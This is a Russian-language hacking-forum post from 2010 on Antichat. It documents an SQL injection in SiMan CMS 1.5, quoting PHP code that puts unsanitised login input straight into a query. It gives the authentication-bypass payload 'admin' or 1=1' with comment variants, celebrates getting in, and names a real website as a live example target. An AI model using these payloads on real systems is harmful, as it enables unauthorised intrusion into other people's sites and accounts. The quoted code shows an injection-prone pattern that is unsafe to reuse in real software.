Энциклопедия уязвимых скриптов

Siman!

#11

26.03.2010, 18:31

Strilo4ka

Reservists Of Antichat - Level 6

Регистрация: 05.04.2009

Сообщений: 231

С нами: 9000386

Репутация: 1148

Siman!

Продукт SiMan CMS 1.5

скачать тут

SQL inj
index.php

PHP код:


		
			
...

$_getvars=$_GET;

$_postvars=$_POST;

$_cookievars=$_COOKIE;

$_servervars=$_SERVER;

$_uplfilevars=$_FILES;

...

PHP код:


		
			
...$module=$_getvars["m"];

        $mode=$_getvars["d"];



        $special['sql']['count']=0;



        if (count($_getvars)==0)

            $special['is_index_page']=1;



        if (empty($module) || strpos($module, ':') || strpos($module, '.') || strpos($module, '/') || strpos($module, '\\'))...

PHP код:


		
			
...if ($module<>'404') include('modules/'.$module.'.php');...

/modules/account.php

PHP код:


		
			
...$modules[$modules_index]["module"]='account';

        $modules[$modules_index]["title"]=$lang["register"];

        $login=$_postvars["p_login"];

        $password=$_postvars["p_password"];

        $password2=$_postvars["p_password2"];...

PHP код:


		
			
...sql="SELECT * FROM ".$tableusersprefix."users WHERE login = '$login'";

            $result=database_db_query($nameDB, $sql, $lnkDB);

            $u=0;

            while ($row=database_fetch_object($result))

                {

                    if (strcmp($row->login, $login)==0)

                        {

                            $u=1;

                        }

                }

            if ($u!=1)

                {

                    include('ext/register.php');

                }

            if ($u==1)...

Условие:
mg=off

durability and result:
action="index.php?m=account&d=login" , метод post
поле login_d [SQL]
поле passwd_d
Тулим:
login_d = admin' or 1=1/*
разные вариации /*, -- # ... , просто есть beta версия CMS

Мы внутри!

Реальный пример:
http://my-tut.org.ua/index.php?m=account&d=login
login_d admin' or 1=1 --
passwd_d безразницы!

Последний раз редактировалось Strilo4ka; 26.03.2010 в 18:47..